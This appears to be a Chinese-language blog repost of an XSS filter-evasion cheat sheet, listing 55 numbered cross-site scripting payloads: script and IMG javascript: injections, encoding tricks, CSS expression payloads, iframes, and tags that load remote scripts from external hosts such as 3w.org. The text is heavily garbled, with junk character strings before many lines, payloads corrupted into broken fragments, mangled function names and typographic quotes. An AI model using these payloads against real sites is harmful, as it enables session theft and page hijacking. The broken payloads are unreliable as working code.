XSS攻击汇总

admin

(1)普通的XSS JavaScript注入
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
: k/ W, V& i: ?& o& m9 X(99)另类弹框
<q/oncut=alert()>1
<s/onclick=alert()>b
<XSS=" onclick="alert(1)//">clickme</SSX=">
- [( r, f, J! \( i1 K+ p2 e! O <zzz onclick=alert`1`>clickme</zzz>
<a onclick=alert`1`>clickme</a>
<a=">clickme</a=">
( q5 G' t1 P( ^# _- `5 r. ]2 |<a=">clickme</a>
<z=">clickme</z=">
. G7 W- y+ M' a" u! H) P4 ^6 ]<z onclick=alert`1`>clickme</z>

(2)IMG标签XSS使用JavaScript命令
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>

(3)IMG标签无分号无引号
<IMG SRC=javascript:alert(‘XSS’)>

$ W4 J2 M0 j1 S; s- C9 o5 O# Z4 x, Y7 @(4)IMG标签大小写不敏感
<IMG SRC=JaVaScRiPt:alert(‘XSS’)>

, F4 p; t, K( F  n+ V& z(5)HTML编码(必须有分号)
<IMG SRC=javascript:alert(“XSS”)>
! Q, L, `1 h: v% ~
(6)修正缺陷IMG标签
<IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>

(7)formCharCode标签(计算器)
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
6 Z: S2 m( u( C+ O" d6 v
# N, q; j8 o  ^+ @8 A1 h8 K1 f+ {(8)UTF-8的Unicode编码(计算器)
<IMG SRC=jav..省略..S')>

(9)7位的UTF-8的Unicode编码是没有分号的(计算器)
- F2 J. U: b  J5 b4 y. i* o<IMG SRC=jav..省略..S')>
/ w  _1 s* Y+ }" Z' `0 Q" k
5 `, M3 \# _, o. B(10)十六进制编码也是没有分号(计算器)
<IMG SRC=\'#\'" /span>

/ j. {; D, E; M( f( l$ p(11)嵌入式标签,将Javascript分开
<IMG SRC=\'#\'" ascript:alert(‘XSS’);”>

(12)嵌入式编码标签,将Javascript分开
<IMG SRC=\'#\'" ascript:alert(‘XSS’);”>

7 z1 A( ^0 {6 }4 G(13)嵌入式换行符
3 W6 r5 c& e- m) ]: U<IMG SRC=\'#\'" ascript:alert(‘XSS’);”>
  I0 ]. {$ r5 s$ w8 ^8 Q
(14)嵌入式回车
<IMG SRC=\'#\'" ascript:alert(‘XSS’);”>
8 R6 @3 q0 ~$ S  M+ H" X- c
, \  P$ Y; v7 S! A: u( b7 L(15)嵌入式多行注入JavaScript,这是XSS极端的例子
6 w0 ^. [( E, `% ^<IMG SRC=\'#\'" /span>
8 T+ X4 {* y( u* X6 ]" O
9 ?" |: d8 S) h# ?* \! c(16)解决限制字符(要求同页面)
( h( s# T* {- r4 @8 R6 y" {% a: b" W  b<script>z=’document.’</script>
5 C4 ^& K" d+ q6 ^! D/ N1 I2 j, E3 O<script>z=z+’write(“‘</script>
<script>z=z+’<script’</script>
<script>z=z+’ src=ht’</script>
<script>z=z+’tp://ww’</script>
<script>z=z+’w.shell’</script>
' l& H, ^" \- a7 _; M<script>z=z+’.net/1.’</script>
<script>z=z+’js></sc’</script>
, _- _6 G9 }8 d) I8 v: C- P<script>z=z+’ript>”)’</script>
<script>eval_r(z)</script>
7 K2 Z- B5 {# V- {$ p
( S! w' W! v5 s6 S(17)空字符
perl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out
" D1 C, E) T  @* k
(18)空字符2,空字符在国内基本没效果.因为没有地方可以利用
& i0 y- E' X# {- zperl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out

* m. y$ P% Q8 Q  [, S(19)Spaces和meta前的IMG标签
<IMG SRC=\'#\'"   javascript:alert(‘XSS’);”>

9 [6 U2 @3 I# v& q! a3 k( h(20)Non-alpha-non-digit XSS
<SCRIPT/XSS SRC=\'#\'" /span>http://3w.org/XSS/xss.js”></SCRIPT>

(21)Non-alpha-non-digit XSS to 2
! ^* P# }+ g; G( r4 t3 ~* O<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>
4 o9 ^& f8 P' e! y% ~8 n: b
0 s- `. [' }4 D8 R2 g(22)Non-alpha-non-digit XSS to 3
<SCRIPT/SRC=\'#\'" /span>http://3w.org/XSS/xss.js”></SCRIPT>
. w& q6 r! e# f  O4 a/ e8 X
) g2 n6 C2 q  f) Q(23)双开括号
+ q: A4 N" F) f) v+ N+ O6 S<<SCRIPT>alert(“XSS”);//<</SCRIPT>

3 O7 J& E3 C* }  c9 ](24)无结束脚本标记(仅火狐等浏览器)
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>

(25)无结束脚本标记2
<SCRIPT SRC=//3w.org/XSS/xss.js>

" ^" W, U/ n7 x2 m4 r: h(26)半开的HTML/JavaScript XSS
<IMG SRC=\'#\'" /span>

(27)双开角括号
<iframe src=http://3w.org/XSS.html <
- X0 D; {% B9 B
7 u1 M; P$ N; a8 @+ z(28)无单引号 双引号 分号
- }& U9 f7 i  O' w/ i" y<SCRIPT>a=/XSS/
: N1 _  n5 ]$ I0 Y1 K/ X1 h" G2 i" walert(a.source)</SCRIPT>
3 S8 Q* S9 `1 j: C% {0 x
) Z( B3 [. S% i# a7 V(29)换码过滤的JavaScript
\”;alert(‘XSS’);//
- v% w/ n( R# K! L5 L( S
  w: Z! p. P4 z4 I, ^" g(30)结束Title标签
</TITLE><SCRIPT>alert(“XSS”);</SCRIPT>

4 n0 s$ L! H1 T! _(31)Input Image
* i& d: L0 {; L% g0 t<INPUT SRC=\'#\'" /span>
! `/ G* V2 t; m
(32)BODY Image
<BODY BACKGROUND=”javascript:alert(‘XSS’)”>

(33)BODY标签
<BODY(‘XSS’)>
& `' v: d! q/ A4 l! H  @
(34)IMG Dynsrc
9 o% w& R' ]- E: t: X* ~<IMG DYNSRC=\'#\'" /span>

(35)IMG Lowsrc
<IMG LOWSRC=\'#\'" /span>

5 v, V. x$ x2 Z* |(36)BGSOUND
<BGSOUND SRC=\'#\'" /span>

: ?% Q, H9 N, v& S+ g(37)STYLE sheet
<LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>

(38)远程样式表
<LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”>

4 r: X5 W9 X& V0 Y( e$ a(39)List-style-image(列表式)
<STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS

; c8 h( p% w- s: B5 I+ y; {(40)IMG VBscript
<IMG SRC=\'#\'" /STYLE><UL><LI>XSS

(41)META链接url
<META HTTP-EQUIV=”refresh” CONTENT=”0; URL=http://;URL=javascript:alert(‘XSS’);”>
" H- i3 L, l  k: s9 ]
+ ~$ J6 }& ?& B(42)Iframe
6 \+ J2 R4 W3 f4 c; ]. w+ ]<IFRAME SRC=\'#\'" /IFRAME>

(43)Frame
<FRAMESET><FRAME SRC=\'#\'" /FRAMESET>
3 c( Z: C4 F7 ^7 {: G3 g1 G( v
/ ?8 N& G$ {2 Z5 d1 g! N, b/ N3 e(44)Table
<TABLE BACKGROUND=”javascript:alert(‘XSS’)”>
' V+ S7 D9 N' {: q6 m: p
(45)TD
+ }0 ]5 u; [2 }<TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>
( i/ l0 Y( |) u% T4 E% z6 z
(46)DIV background-image
<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>
" C  m) d: j0 }( M  k' Y% k
7 M% R9 G/ f" y(47)DIV background-image后加上额外字符(1-32&34&39&160&8192-8&13&12288&65279)
. x  Q2 p6 N$ h' X& W<DIV STYLE=”background-image: url(
javascript:alert(‘XSS’))”>

1 e6 O) A' j/ H$ H3 k(48)DIV expression
<DIV STYLE=”width: expression_r(alert(‘XSS’));”>
; L0 A; O8 t( }! v$ F2 Q
, a$ w0 w1 V- `% a& u  y  B(49)STYLE属性分拆表达
<IMG STYLE=”xss:expression_r(alert(‘XSS’))”>

0 _- [! B, F. r  p: Z- ?5 C* T# b(50)匿名STYLE(组成:开角号和一个字母开头)
<XSS STYLE=”xss:expression_r(alert(‘XSS’))”>
& N0 d* ?) u2 J" Z  C
/ S9 ~: b! S+ Z* a/ {; ^5 S8 [(51)STYLE background-image
) d5 c* {: D% k0 K0 |<STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A CLASS=XSS></A>

- {1 \3 {6 Y" A, g0 N(52)IMG STYLE方式
exppression(alert(“XSS”))’>

(53)STYLE background
<STYLE><STYLE type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>
9 q4 {" C6 c& U& |) W6 G- V
% ~( Y. b. G3 e5 E& Q(54)BASE
6 `4 t  ^  l4 U6 x5 r! X. n<BASE HREF=”javascript:alert(‘XSS’);//”>
8 L5 S6 p/ O, X0 ]! _1 l3 B! x
1 q( R, X' ?; N6 `0 P/ w# a1 d(55)EMBED标签,你可以嵌入FLASH,其中包涵XSS
<EMBED SRC=\'#\'" /span>http://3w.org/XSS/xss.swf” ></EMBED>
8 `5 R. _4 [9 n) d& Q3 U